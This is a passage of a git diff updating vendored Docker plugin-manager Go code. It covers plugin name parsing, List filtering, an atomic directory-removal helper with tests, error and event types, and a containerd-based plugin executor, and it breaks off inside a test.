+	nameref, err := reference.ParseNormalizedNamed(name)
 	if err != nil {
-		return errors.Wrapf(err, "failed to parse %q", name)
+		return errors.Wrapf(errdefs.InvalidParameter(err), "failed to parse %q", name)
 	}
-	name = reference.WithDefaultTag(nameref).String()
+	name = reference.FamiliarString(reference.TagNameOnly(nameref))
 
 	if err := pm.config.Store.validateName(name); err != nil {
-		return err
+		return errdefs.InvalidParameter(err)
 	}
 
 	tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs")
+	if err != nil {
+		return errors.Wrap(errdefs.System(err), "error preparing pull")
+	}
 	defer os.RemoveAll(tmpRootFSDir)
 
 	dm := &downloadManager{
@@ -307,20 +347,58 @@ func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, m
 		return err
 	}
 
-	p, err := pm.createPlugin(name, dm.configDigest, dm.blobs, tmpRootFSDir, &privileges)
+	refOpt := func(p *v2.Plugin) {
+		p.PluginObj.PluginReference = ref.String()
+	}
+	optsList := make([]CreateOpt, 0, len(opts)+1)
+	optsList = append(optsList, opts...)
+	optsList = append(optsList, refOpt)
+
+	p, err := pm.createPlugin(name, dm.configDigest, dm.blobs, tmpRootFSDir, &privileges, optsList...)
 	if err != nil {
 		return err
 	}
-	p.PluginObj.PluginReference = ref.String()
 
+	pm.publisher.Publish(EventCreate{Plugin: p.PluginObj})
 	return nil
 }
 
 // List displays the list of plugins and associated metadata.
-func (pm *Manager) List() ([]types.Plugin, error) {
+func (pm *Manager) List(pluginFilters filters.Args) ([]types.Plugin, error) {
+	if err := pluginFilters.Validate(acceptedPluginFilterTags); err != nil {
+		return nil, err
+	}
+
+	enabledOnly := false
+	disabledOnly := false
+	if pluginFilters.Contains("enabled") {
+		if pluginFilters.ExactMatch("enabled", "true") {
+			enabledOnly = true
+		} else if pluginFilters.ExactMatch("enabled", "false") {
+			disabledOnly = true
+		} else {
+			return nil, invalidFilter{"enabled", pluginFilters.Get("enabled")}
+		}
+	}
+
 	plugins := pm.config.Store.GetAll()
 	out := make([]types.Plugin, 0, len(plugins))
+
+next:
 	for _, p := range plugins {
+		if enabledOnly && !p.PluginObj.Enabled {
+			continue
+		}
+		if disabledOnly && p.PluginObj.Enabled {
+			continue
+		}
+		if pluginFilters.Contains("capability") {
+			for _, f := range p.GetTypes() {
+				if !pluginFilters.Match("capability", f.Capability) {
+					continue next
+				}
+			}
+		}
 		out = append(out, p.PluginObj)
 	}
 	return out, nil
@@ -333,7 +411,7 @@ func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header
 		return err
 	}
 
-	ref, err := reference.ParseNamed(p.Name())
+	ref, err := reference.ParseNormalizedNamed(p.Name())
 	if err != nil {
 		return errors.Wrapf(err, "plugin has invalid name %v for push", p.Name())
 	}
@@ -369,7 +447,8 @@ func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header
 		pm:     pm,
 		plugin: p,
 	}
-	ls := &pluginLayerProvider{
+	lss := make(map[string]distribution.PushLayerProvider)
+	lss[runtime.GOOS] = &pluginLayerProvider{
 		pm:     pm,
 		plugin: p,
 	}
@@ -392,7 +471,7 @@ func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header
 			RequireSchema2:   true,
 		},
 		ConfigMediaType: schema2.MediaTypePluginConfig,
-		LayerStore:      ls,
+		LayerStores:     lss,
 		UploadManager:   uploadManager,
 	}
 
@@ -411,8 +490,8 @@ func (r *pluginReference) References(id digest.Digest) []reference.Named {
 	return []reference.Named{r.name}
 }
 
-func (r *pluginReference) ReferencesByName(ref reference.Named) []reference.Association {
-	return []reference.Association{
+func (r *pluginReference) ReferencesByName(ref reference.Named) []refstore.Association {
+	return []refstore.Association{
 		{
 			Ref: r.name,
 			ID:  r.pluginID,
@@ -422,7 +501,7 @@ func (r *pluginReference) ReferencesByName(ref reference.Named) []reference.Asso
 
 func (r *pluginReference) Get(ref reference.Named) (digest.Digest, error) {
 	if r.name.String() != ref.String() {
-		return digest.Digest(""), reference.ErrDoesNotExist
+		return digest.Digest(""), refstore.ErrDoesNotExist
 	}
 	return r.pluginID, nil
 }
@@ -465,6 +544,11 @@ func (s *pluginConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) {
 	return configToRootFS(c)
 }
 
+func (s *pluginConfigStore) PlatformFromConfig(c []byte) (*specs.Platform, error) {
+	// TODO: LCOW/Plugins. This will need revisiting. For now use the runtime OS
+	return &specs.Platform{OS: runtime.GOOS}, nil
+}
+
 type pluginLayerProvider struct {
 	pm     *Manager
 	plugin *v2.Plugin
@@ -542,10 +626,10 @@ func (pm *Manager) Remove(name string, config *types.PluginRmConfig) error {
 
 	if !config.ForceRemove {
 		if p.GetRefCount() > 0 {
-			return fmt.Errorf("plugin %s is in use", p.Name())
+			return inUseError(p.Name())
 		}
 		if p.IsEnabled() {
-			return fmt.Errorf("plugin %s is enabled", p.Name())
+			return enabledError(p.Name())
 		}
 	}
 
@@ -560,52 +644,19 @@ func (pm *Manager) Remove(name string, config *types.PluginRmConfig) error {
 	}()
 
 	id := p.GetID()
-	pm.config.Store.Remove(p)
 	pluginDir := filepath.Join(pm.config.Root, id)
-	if err := recursiveUnmount(pm.config.Root); err != nil {
-		logrus.WithField("dir", pm.config.Root).WithField("id", id).Warn(err)
-	}
-	if err := os.RemoveAll(pluginDir); err != nil {
-		logrus.Warnf("unable to remove %q from plugin remove: %v", pluginDir, err)
-	}
-	pm.config.LogPluginEvent(id, name, "remove")
-	return nil
-}
 
-func getMounts(root string) ([]string, error) {
-	infos, err := mount.GetMounts()
-	if err != nil {
-		return nil, errors.Wrap(err, "failed to read mount table while performing recursive unmount")
+	if err := mount.RecursiveUnmount(pluginDir); err != nil {
+		return errors.Wrap(err, "error unmounting plugin data")
 	}
 
-	var mounts []string
-	for _, m := range infos {
-		if strings.HasPrefix(m.Mountpoint, root) {
-			mounts = append(mounts, m.Mountpoint)
-		}
-	}
-
-	return mounts, nil
-}
-
-func recursiveUnmount(root string) error {
-	mounts, err := getMounts(root)
-	if err != nil {
+	if err := atomicRemoveAll(pluginDir); err != nil {
 		return err
 	}
 
-	// sort in reverse-lexicographic order so the root mount will always be last
-	sort.Sort(sort.Reverse(sort.StringSlice(mounts)))
-
-	for i, m := range mounts {
-		if err := mount.Unmount(m); err != nil {
-			if i == len(mounts)-1 {
-				return errors.Wrapf(err, "error performing recursive unmount on %s", root)
-			}
-			logrus.WithError(err).WithField("mountpoint", m).Warn("could not unmount")
-		}
-	}
-
+	pm.config.Store.Remove(p)
+	pm.config.LogPluginEvent(id, name, "remove")
+	pm.publisher.Publish(EventRemove{Plugin: p.PluginObj})
 	return nil
 }
 
@@ -627,25 +678,25 @@ func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser,
 	pm.muGC.RLock()
 	defer pm.muGC.RUnlock()
 
-	ref, err := reference.ParseNamed(options.RepoName)
+	ref, err := reference.ParseNormalizedNamed(options.RepoName)
 	if err != nil {
 		return errors.Wrapf(err, "failed to parse reference %v", options.RepoName)
 	}
 	if _, ok := ref.(reference.Canonical); ok {
 		return errors.Errorf("canonical references are not permitted")
 	}
-	taggedRef := reference.WithDefaultTag(ref)
-	name := taggedRef.String()
+	name := reference.FamiliarString(reference.TagNameOnly(ref))
 
 	if err := pm.config.Store.validateName(name); err != nil { // fast check, real check is in createPlugin()
 		return err
 	}
 
 	tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs")
-	defer os.RemoveAll(tmpRootFSDir)
 	if err != nil {
 		return errors.Wrap(err, "failed to create temp directory")
 	}
+	defer os.RemoveAll(tmpRootFSDir)
+
 	var configJSON []byte
 	rootFS := splitConfigRootFSFromTar(tarCtx, &configJSON)
 
@@ -655,7 +706,7 @@ func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser,
 	}
 	defer rootFSBlob.Close()
 	gzw := gzip.NewWriter(rootFSBlob)
-	layerDigester := digest.Canonical.New()
+	layerDigester := digest.Canonical.Digester()
 	rootFSReader := io.TeeReader(rootFS, io.MultiWriter(gzw, layerDigester.Hash()))
 
 	if err := chrootarchive.Untar(rootFSReader, tmpRootFSDir, nil); err != nil {
@@ -700,6 +751,8 @@ func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser,
 		DiffIds: []string{layerDigester.Digest().String()},
 	}
 
+	config.DockerVersion = dockerversion.Version
+
 	configBlob, err := pm.blobStore.New()
 	if err != nil {
 		return err
@@ -717,8 +770,9 @@ func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser,
 	if err != nil {
 		return err
 	}
-	p.PluginObj.PluginReference = taggedRef.String()
+	p.PluginObj.PluginReference = name
 
+	pm.publisher.Publish(EventCreate{Plugin: p.PluginObj})
 	pm.config.LogPluginEvent(p.PluginObj.ID, name, "create")
 
 	return nil
@@ -788,3 +842,35 @@ func splitConfigRootFSFromTar(in io.ReadCloser, config *[]byte) io.ReadCloser {
 	}()
 	return pr
 }
+
+func atomicRemoveAll(dir string) error {
+	renamed := dir + "-removing"
+
+	err := os.Rename(dir, renamed)
+	switch {
+	case os.IsNotExist(err), err == nil:
+		// even if `dir` doesn't exist, we can still try and remove `renamed`
+	case os.IsExist(err):
+		// Some previous remove failed, check if the origin dir exists
+		if e := system.EnsureRemoveAll(renamed); e != nil {
+			return errors.Wrap(err, "rename target already exists and could not be removed")
+		}
+		if _, err := os.Stat(dir); os.IsNotExist(err) {
+			// origin doesn't exist, nothing left to do
+			return nil
+		}
+
+		// attempt to rename again
+		if err := os.Rename(dir, renamed); err != nil {
+			return errors.Wrap(err, "failed to rename dir for atomic removal")
+		}
+	default:
+		return errors.Wrap(err, "failed to rename dir for atomic removal")
+	}
+
+	if err := system.EnsureRemoveAll(renamed); err != nil {
+		os.Rename(renamed, dir)
+		return err
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/plugin/backend_linux_test.go b/vendor/github.com/docker/docker/plugin/backend_linux_test.go
new file mode 100644
index 0000000000..81cf2ebb76
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/backend_linux_test.go
@@ -0,0 +1,81 @@
+package plugin // import "github.com/docker/docker/plugin"
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func TestAtomicRemoveAllNormal(t *testing.T) {
+	dir, err := ioutil.TempDir("", "atomic-remove-with-normal")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(dir) // just try to make sure this gets cleaned up
+
+	if err := atomicRemoveAll(dir); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := os.Stat(dir); !os.IsNotExist(err) {
+		t.Fatalf("dir should be gone: %v", err)
+	}
+	if _, err := os.Stat(dir + "-removing"); !os.IsNotExist(err) {
+		t.Fatalf("dir should be gone: %v", err)
+	}
+}
+
+func TestAtomicRemoveAllAlreadyExists(t *testing.T) {
+	dir, err := ioutil.TempDir("", "atomic-remove-already-exists")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(dir) // just try to make sure this gets cleaned up
+
+	if err := os.MkdirAll(dir+"-removing", 0755); err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(dir + "-removing")
+
+	if err := atomicRemoveAll(dir); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := os.Stat(dir); !os.IsNotExist(err) {
+		t.Fatalf("dir should be gone: %v", err)
+	}
+	if _, err := os.Stat(dir + "-removing"); !os.IsNotExist(err) {
+		t.Fatalf("dir should be gone: %v", err)
+	}
+}
+
+func TestAtomicRemoveAllNotExist(t *testing.T) {
+	if err := atomicRemoveAll("/not-exist"); err != nil {
+		t.Fatal(err)
+	}
+
+	dir, err := ioutil.TempDir("", "atomic-remove-already-exists")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(dir) // just try to make sure this gets cleaned up
+
+	// create the removing dir, but not the "real" one
+	foo := filepath.Join(dir, "foo")
+	removing := dir + "-removing"
+	if err := os.MkdirAll(removing, 0755); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := atomicRemoveAll(dir); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := os.Stat(foo); !os.IsNotExist(err) {
+		t.Fatalf("dir should be gone: %v", err)
+	}
+	if _, err := os.Stat(removing); !os.IsNotExist(err) {
+		t.Fatalf("dir should be gone: %v", err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/plugin/backend_unsupported.go b/vendor/github.com/docker/docker/plugin/backend_unsupported.go
index 66e6dab9e8..c0666e858e 100644
--- a/vendor/github.com/docker/docker/plugin/backend_unsupported.go
+++ b/vendor/github.com/docker/docker/plugin/backend_unsupported.go
@@ -1,15 +1,16 @@
 // +build !linux
 
-package plugin
+package plugin // import "github.com/docker/docker/plugin"
 
 import (
+	"context"
 	"errors"
 	"io"
 	"net/http"
 
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/reference"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/api/types/filters"
 )
 
 var errNotSupported = errors.New("plugins are not supported on this platform")
@@ -35,7 +36,7 @@ func (pm *Manager) Privileges(ctx context.Context, ref reference.Named, metaHead
 }
 
 // Pull pulls a plugin, check if the correct privileges are provided and install the plugin.
-func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, out io.Writer) error {
+func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, out io.Writer, opts ...CreateOpt) error {
 	return errNotSupported
 }
 
@@ -45,7 +46,7 @@ func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string
 }
 
 // List displays the list of plugins and associated metadata.
-func (pm *Manager) List() ([]types.Plugin, error) {
+func (pm *Manager) List(pluginFilters filters.Args) ([]types.Plugin, error) {
 	return nil, errNotSupported
 }
 
diff --git a/vendor/github.com/docker/docker/plugin/blobstore.go b/vendor/github.com/docker/docker/plugin/blobstore.go
index dc9e598e04..a24e7bdf4f 100644
--- a/vendor/github.com/docker/docker/plugin/blobstore.go
+++ b/vendor/github.com/docker/docker/plugin/blobstore.go
@@ -1,20 +1,24 @@
-package plugin
+package plugin // import "github.com/docker/docker/plugin"
 
 import (
+	"context"
+	"fmt"
 	"io"
 	"io/ioutil"
 	"os"
 	"path/filepath"
+	"runtime"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/distribution/xfer"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
 	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/chrootarchive"
 	"github.com/docker/docker/pkg/progress"
+	"github.com/opencontainers/go-digest"
+	specs "github.com/opencontainers/image-spec/specs-go/v1"
 	"github.com/pkg/errors"
-	"golang.org/x/net/context"
+	"github.com/sirupsen/logrus"
 )
 
 type blobstore interface {
@@ -86,7 +90,7 @@ type insertion struct {
 }
 
 func newInsertion(tempFile *os.File) *insertion {
-	digester := digest.Canonical.New()
+	digester := digest.Canonical.Digester()
 	return &insertion{f: tempFile, digester: digester, Writer: io.MultiWriter(tempFile, digester.Hash())}
 }
 
@@ -124,7 +128,7 @@ type downloadManager struct {
 	configDigest digest.Digest
 }
 
-func (dm *downloadManager) Download(ctx context.Context, initialRootFS image.RootFS, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) {
+func (dm *downloadManager) Download(ctx context.Context, initialRootFS image.RootFS, os string, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) {
 	for _, l := range layers {
 		b, err := dm.blobStore.New()
 		if err != nil {
@@ -141,8 +145,9 @@ func (dm *downloadManager) Download(ctx context.Context, initialRootFS image.Roo
 		if err != nil {
 			return initialRootFS, nil, err
 		}
-		digester := digest.Canonical.New()
-		if _, err := archive.ApplyLayer(dm.tmpDir, io.TeeReader(inflatedLayerData, digester.Hash())); err != nil {
+		defer inflatedLayerData.Close()
+		digester := digest.Canonical.Digester()
+		if _, err := chrootarchive.ApplyLayer(dm.tmpDir, io.TeeReader(inflatedLayerData, digester.Hash())); err != nil {
 			return initialRootFS, nil, err
 		}
 		initialRootFS.Append(layer.DiffID(digester.Digest()))
@@ -174,8 +179,12 @@ func (dm *downloadManager) Put(dt []byte) (digest.Digest, error) {
 }
 
 func (dm *downloadManager) Get(d digest.Digest) ([]byte, error) {
-	return nil, digest.ErrDigestNotFound
+	return nil, fmt.Errorf("digest not found")
 }
 func (dm *downloadManager) RootFSFromConfig(c []byte) (*image.RootFS, error) {
 	return configToRootFS(c)
 }
+func (dm *downloadManager) PlatformFromConfig(c []byte) (*specs.Platform, error) {
+	// TODO: LCOW/Plugins. This will need revisiting. For now use the runtime OS
+	return &specs.Platform{OS: runtime.GOOS}, nil
+}
diff --git a/vendor/github.com/docker/docker/plugin/defs.go b/vendor/github.com/docker/docker/plugin/defs.go
index 927f639166..31f7c6bcc3 100644
--- a/vendor/github.com/docker/docker/plugin/defs.go
+++ b/vendor/github.com/docker/docker/plugin/defs.go
@@ -1,16 +1,18 @@
-package plugin
+package plugin // import "github.com/docker/docker/plugin"
 
 import (
 	"sync"
 
 	"github.com/docker/docker/pkg/plugins"
 	"github.com/docker/docker/plugin/v2"
+	"github.com/opencontainers/runtime-spec/specs-go"
 )
 
 // Store manages the plugin inventory in memory and on-disk
 type Store struct {
 	sync.RWMutex
-	plugins map[string]*v2.Plugin
+	plugins  map[string]*v2.Plugin
+	specOpts map[string][]SpecOpt
 	/* handlers are necessary for transition path of legacy plugins
 	 * to the new model. Legacy plugins use Handle() for registering an
 	 * activation callback.*/
@@ -18,9 +20,31 @@ type Store struct {
 }
 
 // NewStore creates a Store.
-func NewStore(libRoot string) *Store {
+func NewStore() *Store {
 	return &Store{
 		plugins:  make(map[string]*v2.Plugin),
+		specOpts: make(map[string][]SpecOpt),
 		handlers: make(map[string][]func(string, *plugins.Client)),
 	}
 }
+
+// SpecOpt is used for subsystems that need to modify the runtime spec of a plugin
+type SpecOpt func(*specs.Spec)
+
+// CreateOpt is used to configure specific plugin details when created
+type CreateOpt func(p *v2.Plugin)
+
+// WithSwarmService is a CreateOpt that flags the passed in a plugin as a plugin
+// managed by swarm
+func WithSwarmService(id string) CreateOpt {
+	return func(p *v2.Plugin) {
+		p.SwarmServiceID = id
+	}
+}
+
+// WithSpecMounts is a SpecOpt which appends the provided mounts to the runtime spec
+func WithSpecMounts(mounts []specs.Mount) SpecOpt {
+	return func(s *specs.Spec) {
+		s.Mounts = append(s.Mounts, mounts...)
+	}
+}
diff --git a/vendor/github.com/docker/docker/plugin/errors.go b/vendor/github.com/docker/docker/plugin/errors.go
new file mode 100644
index 0000000000..44d99b39b2
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/errors.go
@@ -0,0 +1,66 @@
+package plugin // import "github.com/docker/docker/plugin"
+
+import "fmt"
+
+type errNotFound string
+
+func (name errNotFound) Error() string {
+	return fmt.Sprintf("plugin %q not found", string(name))
+}
+
+func (errNotFound) NotFound() {}
+
+type errAmbiguous string
+
+func (name errAmbiguous) Error() string {
+	return fmt.Sprintf("multiple plugins found for %q", string(name))
+}
+
+func (name errAmbiguous) InvalidParameter() {}
+
+type errDisabled string
+
+func (name errDisabled) Error() string {
+	return fmt.Sprintf("plugin %s found but disabled", string(name))
+}
+
+func (name errDisabled) Conflict() {}
+
+type invalidFilter struct {
+	filter string
+	value  []string
+}
+
+func (e invalidFilter) Error() string {
+	msg := "Invalid filter '" + e.filter
+	if len(e.value) > 0 {
+		msg += fmt.Sprintf("=%s", e.value)
+	}
+	return msg + "'"
+}
+
+func (invalidFilter) InvalidParameter() {}
+
+type inUseError string
+
+func (e inUseError) Error() string {
+	return "plugin " + string(e) + " is in use"
+}
+
+func (inUseError) Conflict() {}
+
+type enabledError string
+
+func (e enabledError) Error() string {
+	return "plugin " + string(e) + " is enabled"
+}
+
+func (enabledError) Conflict() {}
+
+type alreadyExistsError string
+
+func (e alreadyExistsError) Error() string {
+	return "plugin " + string(e) + " already exists"
+}
+
+func (alreadyExistsError) Conflict() {}
diff --git a/vendor/github.com/docker/docker/plugin/events.go b/vendor/github.com/docker/docker/plugin/events.go
new file mode 100644
index 0000000000..d204340aa7
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/events.go
@@ -0,0 +1,111 @@
+package plugin // import "github.com/docker/docker/plugin"
+
+import (
+	"fmt"
+	"reflect"
+
+	"github.com/docker/docker/api/types"
+)
+
+// Event is emitted for actions performed on the plugin manager
+type Event interface {
+	matches(Event) bool
+}
+
+// EventCreate is an event which is emitted when a plugin is created
+// This is either by pull or create from context.
+//
+// Use the `Interfaces` field to match only plugins that implement a specific
+// interface.
+// These are matched against using "or" logic.
+// If no interfaces are listed, all are matched.
+type EventCreate struct {
+	Interfaces map[string]bool
+	Plugin     types.Plugin
+}
+
+func (e EventCreate) matches(observed Event) bool {
+	oe, ok := observed.(EventCreate)
+	if !ok {
+		return false
+	}
+	if len(e.Interfaces) == 0 {
+		return true
+	}
+
+	var ifaceMatch bool
+	for _, in := range oe.Plugin.Config.Interface.Types {
+		if e.Interfaces[in.Capability] {
+			ifaceMatch = true
+			break
+		}
+	}
+	return ifaceMatch
+}
+
+// EventRemove is an event which is emitted when a plugin is removed
+// It maches on the passed in plugin's ID only.
+type EventRemove struct {
+	Plugin types.Plugin
+}
+
+func (e EventRemove) matches(observed Event) bool {
+	oe, ok := observed.(EventRemove)
+	if !ok {
+		return false
+	}
+	return e.Plugin.ID == oe.Plugin.ID
+}
+
+// EventDisable is an event that is emitted when a plugin is disabled
+// It maches on the passed in plugin's ID only.
+type EventDisable struct {
+	Plugin types.Plugin
+}
+
+func (e EventDisable) matches(observed Event) bool {
+	oe, ok := observed.(EventDisable)
+	if !ok {
+		return false
+	}
+	return e.Plugin.ID == oe.Plugin.ID
+}
+
+// EventEnable is an event that is emitted when a plugin is disabled
+// It maches on the passed in plugin's ID only.
+type EventEnable struct {
+	Plugin types.Plugin
+}
+
+func (e EventEnable) matches(observed Event) bool {
+	oe, ok := observed.(EventEnable)
+	if !ok {
+		return false
+	}
+	return e.Plugin.ID == oe.Plugin.ID
+}
+
+// SubscribeEvents provides an event channel to listen for structured events from
+// the plugin manager actions, CRUD operations.
+// The caller must call the returned `cancel()` function once done with the channel
+// or this will leak resources.
+func (pm *Manager) SubscribeEvents(buffer int, watchEvents ...Event) (eventCh <-chan interface{}, cancel func()) {
+	topic := func(i interface{}) bool {
+		observed, ok := i.(Event)
+		if !ok {
+			panic(fmt.Sprintf("unexpected type passed to event channel: %v", reflect.TypeOf(i)))
+		}
+		for _, e := range watchEvents {
+			if e.matches(observed) {
+				return true
+			}
+		}
+		// If no specific events are specified always assume a matched event
+		// If some events were specified and none matched above, then the event
+		// doesn't match
+		return watchEvents == nil
+	}
+	ch := pm.publisher.SubscribeTopicWithBuffer(topic, buffer)
+	cancelFunc := func() { pm.publisher.Evict(ch) }
+	return ch, cancelFunc
+}
diff --git a/vendor/github.com/docker/docker/plugin/executor/containerd/containerd.go b/vendor/github.com/docker/docker/plugin/executor/containerd/containerd.go
new file mode 100644
index 0000000000..8f1c8a4a19
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/executor/containerd/containerd.go
@@ -0,0 +1,175 @@
+package containerd // import "github.com/docker/docker/plugin/executor/containerd"
+
+import (
+	"context"
+	"io"
+	"path/filepath"
+	"sync"
+	"time"
+
+	"github.com/containerd/containerd/cio"
+	"github.com/containerd/containerd/runtime/linux/runctypes"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/libcontainerd"
+	"github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+// pluginNamespace is the name used for the plugins namespace
+const pluginNamespace = "plugins.moby"
+
+// ExitHandler represents an object that is called when the exit event is received from containerd
+type ExitHandler interface {
+	HandleExitEvent(id string) error
+}
+
+// Client is used by the exector to perform operations.
+// TODO(@cpuguy83): This should really just be based off the containerd client interface.
+// However right now this whole package is tied to github.com/docker/docker/libcontainerd
+type Client interface {
+	Create(ctx context.Context, containerID string, spec *specs.Spec, runtimeOptions interface{}) error
+	Restore(ctx context.Context, containerID string, attachStdio libcontainerd.StdioCallback) (alive bool, pid int, err error)
+	Status(ctx context.Context, containerID string) (libcontainerd.Status, error)
+	Delete(ctx context.Context, containerID string) error
+	DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error)
+	Start(ctx context.Context, containerID, checkpointDir string, withStdin bool, attachStdio libcontainerd.StdioCallback) (pid int, err error)
+	SignalProcess(ctx context.Context, containerID, processID string, signal int) error
+}
+
+// New creates a new containerd plugin executor
+func New(rootDir string, remote libcontainerd.Remote, exitHandler ExitHandler) (*Executor, error) {
+	e := &Executor{
+		rootDir:     rootDir,
+		exitHandler: exitHandler,
+	}
+	client, err := remote.NewClient(pluginNamespace, e)
+	if err != nil {
+		return nil, errors.Wrap(err, "error creating containerd exec client")
+	}
+	e.client = client
+	return e, nil
+}
+
+// Executor is the containerd client implementation of a plugin executor
+type Executor struct {
+	rootDir     string
+	client      Client
+	exitHandler ExitHandler
+}
+
+// deleteTaskAndContainer deletes plugin task and then plugin container from containerd
+func deleteTaskAndContainer(ctx context.Context, cli Client, id string) {
+	_, _, err := cli.DeleteTask(ctx, id)
+	if err != nil && !errdefs.IsNotFound(err) {
+		logrus.WithError(err).WithField("id", id).Error("failed to delete plugin task from containerd")
+	}
+
+	err = cli.Delete(ctx, id)
+	if err != nil && !errdefs.IsNotFound(err) {
+		logrus.WithError(err).WithField("id", id).Error("failed to delete plugin container from containerd")
+	}
+}
+
+// Create creates a new container
+func (e *Executor) Create(id string, spec specs.Spec, stdout, stderr io.WriteCloser) error {
+	opts := runctypes.RuncOptions{
+		RuntimeRoot: filepath.Join(e.rootDir, "runtime-root"),
+	}
+	ctx := context.Background()
+	err := e.client.Create(ctx, id, &spec, &opts)
+	if err != nil {
+		status, err2 := e.client.Status(ctx, id)
+		if err2 != nil {
+			if !errdefs.IsNotFound(err2) {
+				logrus.WithError(err2).WithField("id", id).Warn("Received an error while attempting to read plugin status")
+			}
+		} else {
+			if status != libcontainerd.StatusRunning && status != libcontainerd.StatusUnknown {
+				if err2 := e.client.Delete(ctx, id); err2 != nil && !errdefs.IsNotFound(err2) {
+					logrus.WithError(err2).WithField("plugin", id).Error("Error cleaning up containerd container")
+				}
+				err = e.client.Create(ctx, id, &spec, &opts)
+			}
+		}
+
+		if err != nil {
+			return errors.Wrap(err, "error creating containerd container")
+		}
+	}
+
+	_, err = e.client.Start(ctx, id, "", false, attachStreamsFunc(stdout, stderr))
+	if err != nil {
+		deleteTaskAndContainer(ctx, e.client, id)
+	}
+	return err
+}
+
+// Restore restores a container
+func (e *Executor) Restore(id string, stdout, stderr io.WriteCloser) (bool, error) {
+	alive, _, err := e.client.Restore(context.Background(), id, attachStreamsFunc(stdout, stderr))
+	if err != nil && !errdefs.IsNotFound(err) {
+		return false, err
+	}
+	if !alive {
+		deleteTaskAndContainer(context.Background(), e.client, id)
+	}
+	return alive, nil
+}
+
+// IsRunning returns if the container with the given id is running
+func (e *Executor) IsRunning(id string) (bool, error) {
+	status, err := e.client.Status(context.Background(), id)
+	return status == libcontainerd.StatusRunning, err
+}
+
+// Signal sends the specified signal to the container
+func (e *Executor) Signal(id string, signal int) error {
+	return e.client.SignalProcess(context.Background(), id, libcontainerd.InitProcessName, signal)
+}
+
+// ProcessEvent handles events from containerd
+// All events are ignored except the exit event, which is sent of to the stored handler
+func (e *Executor) ProcessEvent(id string, et libcontainerd.EventType, ei libcontainerd.EventInfo) error {
+	switch et {
+	case libcontainerd.EventExit:
+		deleteTaskAndContainer(context.Background(), e.client, id)
+		return e.exitHandler.HandleExitEvent(ei.ContainerID)
+	}
+	return nil
+}
+
+type rio struct {
+	cio.IO
+
+	wg sync.WaitGroup
+}
+
+func (c *rio) Wait() {
+	c.wg.Wait()
+	c.IO.Wait()
+}
+
+func attachStreamsFunc(stdout, stderr io.WriteCloser) libcontainerd.StdioCallback {
+	return func(iop *cio.DirectIO) (cio.IO, error) {
+		if iop.Stdin != nil {
+			iop.Stdin.Close()
+			// closing stdin shouldn't be needed here, it should never be open
+			panic("plugin stdin shouldn't have been created!")
+		}
+
+		rio := &rio{IO: iop}
+		rio.wg.Add(2)
+		go func() {
+			io.Copy(stdout, iop.Stdout)
+			stdout.Close()
+			rio.wg.Done()
+		}()
+		go func() {
+			io.Copy(stderr, iop.Stderr)
+			stderr.Close()
+			rio.wg.Done()
+		}()
+		return rio, nil
+	}
+}
diff --git a/vendor/github.com/docker/docker/plugin/executor/containerd/containerd_test.go b/vendor/github.com/docker/docker/plugin/executor/containerd/containerd_test.go
new file mode 100644
index 0000000000..e27063b1d8
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/executor/containerd/containerd_test.go
@@ -0,0 +1,148 @@
+package containerd
+
+import (
+	"context"
+	"io/ioutil"
+	"os"
+	"sync"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/libcontainerd"
+	"github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/pkg/errors"
+	"gotest.tools/assert"
+)
+
+func TestLifeCycle(t *testing.T) {
+	t.Parallel()
+
+	mock := newMockClient()
+	exec, cleanup := setupTest(t, mock, mock)
+	defer cleanup()
+
+	id := "test-create"
+	mock.simulateStartError(true, id)
+	err := exec.Create(id, specs.Spec{}, nil, nil)
+	assert.Assert(t, err != nil)
+	mock.simulateStartError(false, id)
+
+	err = exec.Create(id, specs.Spec{}, nil, nil)
+	assert.Assert(t, err)
